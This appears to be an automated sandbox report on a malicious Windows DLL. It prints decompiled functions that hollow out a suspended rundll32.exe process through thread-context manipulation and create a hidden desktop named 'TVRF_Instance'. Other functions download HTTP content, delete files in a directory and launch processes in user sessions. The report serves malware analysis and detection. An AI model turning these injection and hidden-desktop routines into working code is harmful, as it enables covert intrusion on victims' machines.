									_v552 = E6F3323B0 - "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + _t52;
									if(NtSetContextThread(_v808,  &(_v792.hStdError)) < 0 || NtResumeThread(_v812, 0) < 0) {
										goto L8;
									} else {
										_t38 = 1;
									}
								}
							}
							CloseHandle(_v812);
							CloseHandle(_v816);
						}
						HeapFree(GetProcessHeap(), 0, _t55);
					}
					return _t38;
				}
			}














                                                                                                                        0x6f332758
                                                                                                                        0x6f332760
                                                                                                                        0x6f33276b
                                                                                                                        0x6f3328a2
                                                                                                                        0x6f332771
                                                                                                                        0x6f332789
                                                                                                                        0x6f33278d
                                                                                                                        0x6f332793
                                                                                                                        0x6f3327aa
                                                                                                                        0x6f3327b3
                                                                                                                        0x6f3327b9
                                                                                                                        0x6f3327ba
                                                                                                                        0x6f3327bf
                                                                                                                        0x6f3327c5
                                                                                                                        0x6f3327c6
                                                                                                                        0x6f3327ce
                                                                                                                        0x6f3327ee
                                                                                                                        0x6f3327f8
                                                                                                                        0x6f3327fe
                                                                                                                        0x6f332805
                                                                                                                        0x6f33285f
                                                                                                                        0x6f332863
                                                                                                                        0x6f332865
                                                                                                                        0x6f332866
                                                                                                                        0x6f332807
                                                                                                                        0x6f332811
                                                                                                                        0x6f332820
                                                                                                                        0x00000000
                                                                                                                        0x6f332822
                                                                                                                        0x6f332839
                                                                                                                        0x6f332847
                                                                                                                        0x00000000
                                                                                                                        0x6f332858
                                                                                                                        0x6f332858
                                                                                                                        0x6f332858
                                                                                                                        0x6f332847
                                                                                                                        0x6f332820
                                                                                                                        0x6f332876
                                                                                                                        0x6f33287d
                                                                                                                        0x6f33287d
                                                                                                                        0x6f332885
                                                                                                                        0x6f332885
                                                                                                                        0x6f332897
                                                                                                                        0x6f332897

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 6F332762
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000030C), ref: 6F332780
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F332783
                                                                                                                        • wsprintfA.USER32 ref: 6F3327AA
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F3327BA
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F3327CE
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6F3327E6
                                                                                                                        • NtGetContextThread.NTDLL ref: 6F332819
                                                                                                                        • NtSetContextThread.NTDLL ref: 6F332840
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33284F
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F332866
                                                                                                                        • CloseHandle.KERNEL32(?,00000044), ref: 6F332876
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F33287D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332882
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332885
                                                                                                                          • Part of subcall function 6F332640: RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                          • Part of subcall function 6F332640: NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                          • Part of subcall function 6F332640: RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                          • Part of subcall function 6F332640: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                          • Part of subcall function 6F332640: NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
                                                                                                                        • String ID: "%s%s" %s "%s"$-svcr$D$rundll32.exe
                                                                                                                        • API String ID: 4033018722-303510360
                                                                                                                        • Opcode ID: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction ID: ab8fbcfaaba371c1cfa2fd055eaa8892908f670feda343a685b42d24368fb71a
                                                                                                                        • Opcode Fuzzy Hash: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction Fuzzy Hash: B431E5B3A043A96BD310DB65CD80E6BB7DDEBC5768F00091CFA5496280C778D90987B2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A130, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 72threadsleepsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33A130(void* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t5;
				struct HDESK__* _t7;
				struct HDESK__* _t13;
				void* _t15;

				if( *0x6f34027c < 6 || M6F340544 != 0 || M6F340548 == 0) {
					if(_a4 == 0) {
						return _t5;
					} else {
						_a4 = 1;
						_t7 = GetThreadDesktop(GetCurrentThreadId());
						 *0x6f340484 = _t7;
						if(_t7 != 0) {
							_t7 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
							 *0x6f340480 = _t7;
							if(_t7 != 0) {
								_t15 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
								if(_t15 != 0) {
									WaitForSingleObject(_t15, 0xffffffff);
									CloseHandle(_t15);
									Sleep(0xfa0);
								}
								_t13 =  *0x6f340480; // 0x0
								return CloseDesktop(_t13);
							}
						}
						return _t7;
					}
				} else {
					_push(__edi);
					__eax = CreateEventA(0, 1, 0, "TVRF_Instance");
					__edi = __eax;
					if(__edi == 0) {
						L12:
						_pop(__edi);
						return __eax;
					}
					if(GetLastError() == 0xb7) {
						__eax = CloseHandle(__edi);
						goto L12;
					}
					__eax = GetCurrentThreadId();
					__eax = GetThreadDesktop(__eax);
					__ebx = CloseHandle;
					 *0x6f340484 = __eax;
					if(__eax != 0) {
						__eax = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
						 *0x6f340480 = __eax;
						if(__eax != 0) {
							__eax = _a4;
							_push(__esi);
							__esi = CreateThread(0, 0, E6F339D10, _a4, 0, 0);
							if(__esi != 0) {
								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
								Sleep(0xfa0);
							}
							__ecx =  *0x6f340480; // 0x0
							__eax = CloseDesktop(__ecx);
							_pop(__esi);
						}
					}
					__eax = CloseHandle(__edi);
					_pop(__edi);
					return __eax;
				}
			}










                                                                                                                        0x6f33a137
                                                                                                                        0x6f33a212
                                                                                                                        0x6f33a184
                                                                                                                        0x6f33a218
                                                                                                                        0x6f33a218
                                                                                                                        0x6f339bd7
                                                                                                                        0x6f339bdd
                                                                                                                        0x6f339be4
                                                                                                                        0x6f339bf8
                                                                                                                        0x6f339bfe
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c20
                                                                                                                        0x6f339c24
                                                                                                                        0x6f339c29
                                                                                                                        0x6f339c30
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c41
                                                                                                                        0x00000000
                                                                                                                        0x6f339c4e
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c4f
                                                                                                                        0x6f339c4f
                                                                                                                        0x6f33a157
                                                                                                                        0x6f33a157
                                                                                                                        0x6f33a163
                                                                                                                        0x6f33a169
                                                                                                                        0x6f33a16d
                                                                                                                        0x6f33a183
                                                                                                                        0x6f33a183
                                                                                                                        0x00000000
                                                                                                                        0x6f33a183
                                                                                                                        0x6f33a17a
                                                                                                                        0x6f33a17d
                                                                                                                        0x00000000
                                                                                                                        0x6f33a17d
                                                                                                                        0x6f33a186
                                                                                                                        0x6f33a18d
                                                                                                                        0x6f33a193
                                                                                                                        0x6f33a199
                                                                                                                        0x6f33a1a0
                                                                                                                        0x6f33a1b4
                                                                                                                        0x6f33a1ba
                                                                                                                        0x6f33a1c1
                                                                                                                        0x6f33a1c3
                                                                                                                        0x6f33a1c7
                                                                                                                        0x6f33a1dc
                                                                                                                        0x6f33a1e0
                                                                                                                        0x6f33a1ec
                                                                                                                        0x6f33a1f3
                                                                                                                        0x6f33a1f3
                                                                                                                        0x6f33a1f9
                                                                                                                        0x6f33a200
                                                                                                                        0x6f33a206
                                                                                                                        0x6f33a206
                                                                                                                        0x6f33a1c1
                                                                                                                        0x6f33a208
                                                                                                                        0x6f33a20b
                                                                                                                        0x6f33a20c
                                                                                                                        0x6f33a20c

                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,TVRF_Instance,770CF930,6F33A2BE,00000001,?,?,?,?,?,?), ref: 6F33A163
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 6F33A16F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F33A17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33A186
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A18D
                                                                                                                        • CreateDesktopA.USER32 ref: 6F33A1B4
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33A1D6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 6F33A1E5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A1EC
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?,?), ref: 6F33A1F3
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A200
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A208
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 2944326888-3589830093
                                                                                                                        • Opcode ID: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction ID: bac5d0e4c9355bf7b1ac25f67ff437522f8d4f87fd77d88c8d8bfccc3d769250
                                                                                                                        • Opcode Fuzzy Hash: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction Fuzzy Hash: 1021C077A45BA6ABEF60EB249C48F99376EEB43731F10020DF521952C0CB79E460DA25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335540, Relevance: 21.1, APIs: 14, Instructions: 117memorynetworkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335540(void* _a4, intOrPtr* _a8) {
				long _v4;
				void _v8;
				long* _v12;
				void* _v16;
				intOrPtr _v28;
				long _v32;
				void* _v44;
				int _v48;
				long _v60;
				int _t35;
				long _t40;
				void* _t44;
				long _t53;
				DWORD* _t54;

				_t54 = 0;
				_t53 = 0;
				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
				if(_t44 == 0) {
					 *_a8 = 0;
					return 0;
				} else {
					_v8 = 0;
					_v4 = 4;
					if(HttpQueryInfoA(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
						_v32 = 0;
						if(InternetReadFile(_v16, _t44, 0x1fff,  &_v32) != 0) {
							while(1) {
								_t35 = _v48;
								if(_t35 == 0) {
									goto L15;
								}
								if(_t54 > 0x100000) {
									if(_t53 != 0) {
										goto L13;
									}
									goto L14;
								} else {
									if(_t53 != 0) {
										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
										if(_t40 == 0) {
											L13:
											HeapFree(GetProcessHeap(), 0, _t53);
											L14:
											_t53 = 0;
											_t54 = 0;
										} else {
											goto L10;
										}
									} else {
										_t12 = _t54 + 1; // 0x20000014
										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
										L10:
										_t53 = _t40;
										RtlMoveMemory(_t53 + _t54, _t44, _v48);
										_t54 = _t54 + _v60;
										 *(_t53 + _t54) = 0;
										_v60 = 0;
										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
											continue;
										} else {
										}
									}
								}
								goto L15;
							}
						}
					}
					L15:
					HeapFree(GetProcessHeap(), 0, _t44);
					 *_v12 = _t53;
					return _t54;
				}
			}

















                                                                                                                        0x6f335554
                                                                                                                        0x6f335556
                                                                                                                        0x6f335561
                                                                                                                        0x6f335565
                                                                                                                        0x6f33567f
                                                                                                                        0x6f33568a
                                                                                                                        0x6f33556b
                                                                                                                        0x6f335580
                                                                                                                        0x6f335584
                                                                                                                        0x6f335594
                                                                                                                        0x6f3355b8
                                                                                                                        0x6f3355c4
                                                                                                                        0x6f3355d0
                                                                                                                        0x6f3355d0
                                                                                                                        0x6f3355d6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e2
                                                                                                                        0x6f33564d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e4
                                                                                                                        0x6f3355e6
                                                                                                                        0x6f335604
                                                                                                                        0x6f33560c
                                                                                                                        0x6f33564f
                                                                                                                        0x6f335655
                                                                                                                        0x6f33565b
                                                                                                                        0x6f33565b
                                                                                                                        0x6f33565d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e8
                                                                                                                        0x6f3355e8
                                                                                                                        0x6f3355f1
                                                                                                                        0x6f33560e
                                                                                                                        0x6f335613
                                                                                                                        0x6f33561a
                                                                                                                        0x6f33561f
                                                                                                                        0x6f335632
                                                                                                                        0x6f335637
                                                                                                                        0x6f335647
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335649
                                                                                                                        0x6f335647
                                                                                                                        0x6f3355e6
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e2
                                                                                                                        0x6f3355d0
                                                                                                                        0x6f3355c4
                                                                                                                        0x6f33565f
                                                                                                                        0x6f335665
                                                                                                                        0x6f33566f
                                                                                                                        0x6f33567a
                                                                                                                        0x6f33567a

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 6F335558
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33555B
                                                                                                                        • HttpQueryInfoA.WININET ref: 6F33558C
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F3355BC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,20000014), ref: 6F3355EE
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3355F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 6F335601
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 6F335604
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 6F33561A
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F33563F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335652
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335655
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335662
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335665
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1362589046-0
                                                                                                                        • Opcode ID: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction ID: 3b712053e6030056f4d301237fd8775ea5e0c5217c75fde754730b638ba1ce80
                                                                                                                        • Opcode Fuzzy Hash: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction Fuzzy Hash: 373189B26043A6ABE710CE699844F6BB7AEFB89754F00091DF949C2140DB31E9088B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3328B0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 81%
                                                                                                                        			E6F3328B0(intOrPtr _a8) {
				intOrPtr _v4;
				char _v520;
				char _v528;
				struct _WIN32_FIND_DATAA _v840;
				void* _t25;
				intOrPtr _t36;
				char _t43;
				void* _t48;
				CHAR* _t49;
				struct _WIN32_FIND_DATAA* _t53;
				DWORD* _t54;

				_t53 =  &_v840;
				_push(0x140);
				_push( &_v840);
				L6F33C2EE();
				_push(0x208);
				_push( &_v528);
				L6F33C2EE();
				_t43 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
				_t49 = _t53 + wsprintfA( &(_v840.cAlternateFileName), "%s", _t43) + 0x160;
				wsprintfA(_t49, "%s%c%s", 0x6f33d543, 0x2a, _v4);
				_t54 =  &(_t53->nFileSizeLow);
				_t25 = FindFirstFileA( &_v520,  &_v840);
				_t48 = _t25;
				 *_t49 = 0;
				if(_t48 == 0xffffffff) {
					return _t25;
				} else {
					_t36 = _a8;
					do {
						if(lstrcmpA( &(_v840.cFileName), ".") != 0 && lstrcmpA( &(_v840.cFileName), "..") != 0) {
							lstrcatA( &_v520,  &(_v840.cFileName));
							if((_v840.dwFileAttributes & 0x00000010) == 0) {
								if(_t36 == 0) {
									E6F332750( &_v520);
									_t54 =  &(_t54[1]);
								} else {
									DeleteFileA( &_v520);
								}
							}
						}
						 *_t49 = 0;
					} while (FindNextFileA(_t48,  &_v840) != 0);
					return FindClose(_t48);
				}
			}














                                                                                                                        0x6f3328b0
                                                                                                                        0x6f3328b8
                                                                                                                        0x6f3328c1
                                                                                                                        0x6f3328c2
                                                                                                                        0x6f3328c7
                                                                                                                        0x6f3328d3
                                                                                                                        0x6f3328d4
                                                                                                                        0x6f3328d9
                                                                                                                        0x6f332904
                                                                                                                        0x6f332911
                                                                                                                        0x6f332913
                                                                                                                        0x6f332923
                                                                                                                        0x6f332929
                                                                                                                        0x6f33292b
                                                                                                                        0x6f332931
                                                                                                                        0x6f3329c8
                                                                                                                        0x6f332937
                                                                                                                        0x6f332938
                                                                                                                        0x6f332946
                                                                                                                        0x6f332954
                                                                                                                        0x6f332973
                                                                                                                        0x6f33297e
                                                                                                                        0x6f332982
                                                                                                                        0x6f33299c
                                                                                                                        0x6f3329a1
                                                                                                                        0x6f332984
                                                                                                                        0x6f33298c
                                                                                                                        0x6f33298c
                                                                                                                        0x6f332982
                                                                                                                        0x6f33297e
                                                                                                                        0x6f3329aa
                                                                                                                        0x6f3329b3
                                                                                                                        0x00000000
                                                                                                                        0x6f3329bf

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                        • wsprintfA.USER32 ref: 6F3328F3
                                                                                                                        • wsprintfA.USER32 ref: 6F332911
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D538), ref: 6F332950
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
                                                                                                                        • String ID: %s%c%s
                                                                                                                        • API String ID: 1322953341-2756932909
                                                                                                                        • Opcode ID: 830101d25dbd1bdc67f54a28ee9a27248f76c7ba02f6e53dedd4d41156896bd9
                                                                                                                        • Instruction ID: d6b98663d72a1ff9cbf405f5d9242ef888dd8abf659fcc356b496d4c2fbdd1d7
                                                                                                                        • Opcode Fuzzy Hash: 830101d25dbd1bdc67f54a28ee9a27248f76c7ba02f6e53dedd4d41156896bd9
                                                                                                                        • Instruction Fuzzy Hash: 8D2191739043D9EBD724DBA4CC44EEBB7EDAF8A314F04491DF69482180EB71E1188762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333610, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80sleepprocessCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E6F333610(intOrPtr _a8) {
				WCHAR* _v24;
				struct _STARTUPINFOW _v96;
				struct _PROCESS_INFORMATION _v112;
				long _v116;
				void* _v120;
				void* _t19;
				void* _t26;
				WCHAR* _t29;
				void* _t37;
				intOrPtr _t38;

				_push(_a8);
				_t19 = E6F3334B0();
				_t37 = _t19;
				_t38 = 0;
				if(_t37 != 0) {
					_push(0);
					_push(_t37);
					_push( &(_v96.lpReserved));
					_v96.lpDesktop = 0x20;
					_v96.lpReserved = 0;
					L6F33C37E();
					if(_t19 != 0) {
						_v112.dwThreadId = 0x420;
					}
					_push(0x44);
					_push( &(_v96.dwX));
					L6F33C2EE();
					_push(0x10);
					_push( &(_v112.dwProcessId));
					_v96.lpDesktop = 0x44;
					_v96.dwX = L"Winsta0\\Default";
					L6F33C2EE();
					_t29 = _v24;
					while(CreateProcessAsUserW(_t37, 0, _t29, 0, 0, 0, _v116, _v120, 0,  &_v96,  &_v112) == 0) {
						Sleep(0x1f4);
						_t38 = _t38 + 1;
						if(_t38 < 0x78) {
							continue;
						}
						L8:
						_t26 = _v120;
						if(_t26 != 0) {
							_push(_t26);
							L6F33C378();
						}
						return CloseHandle(_t37);
					}
					CloseHandle(_v112.hThread);
					CloseHandle(_v112);
					goto L8;
				}
				return _t19;
			}













                                                                                                                        0x6f333619
                                                                                                                        0x6f33361a
                                                                                                                        0x6f33361f
                                                                                                                        0x6f333621
                                                                                                                        0x6f333628
                                                                                                                        0x6f33362e
                                                                                                                        0x6f33362f
                                                                                                                        0x6f333634
                                                                                                                        0x6f333635
                                                                                                                        0x6f33363d
                                                                                                                        0x6f333641
                                                                                                                        0x6f333648
                                                                                                                        0x6f33364a
                                                                                                                        0x6f33364a
                                                                                                                        0x6f333654
                                                                                                                        0x6f33365a
                                                                                                                        0x6f33365b
                                                                                                                        0x6f333660
                                                                                                                        0x6f333666
                                                                                                                        0x6f333667
                                                                                                                        0x6f33366f
                                                                                                                        0x6f333677
                                                                                                                        0x6f33367c
                                                                                                                        0x6f333686
                                                                                                                        0x6f3336b1
                                                                                                                        0x6f3336b7
                                                                                                                        0x6f3336bb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3336d9
                                                                                                                        0x6f3336d9
                                                                                                                        0x6f3336e1
                                                                                                                        0x6f3336e3
                                                                                                                        0x6f3336e4
                                                                                                                        0x6f3336e4
                                                                                                                        0x00000000
                                                                                                                        0x6f3336ea
                                                                                                                        0x6f3336d0
                                                                                                                        0x6f3336d7
                                                                                                                        0x00000000
                                                                                                                        0x6f3336d7
                                                                                                                        0x6f3336f1

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F3334B0: WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                          • Part of subcall function 6F3334B0: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                          • Part of subcall function 6F3334B0: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D0
